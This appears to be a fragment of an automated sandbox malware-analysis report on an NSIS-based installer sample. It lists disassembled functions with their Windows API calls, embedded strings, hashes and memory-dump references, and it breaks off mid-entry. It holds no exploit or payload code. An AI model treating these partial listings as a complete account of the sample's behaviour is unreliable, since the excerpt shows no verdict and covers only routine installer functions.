                                                                                                                                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                      • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                      Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                      Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                                      Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                      Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(0005EC00,00000064,00124D0E), ref: 00403295
                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                      Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                      Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(008580D0), ref: 00402387
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                      • String ID: Exch: stack < %d elements$KsUtilizeBuildings$Pop: stack empty
                                                                                                                                                                                                                                                                                      • API String ID: 1459762280-1353808379
                                                                                                                                                                                                                                                                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                      Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                      Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(008580D0), ref: 00402387
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                      Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
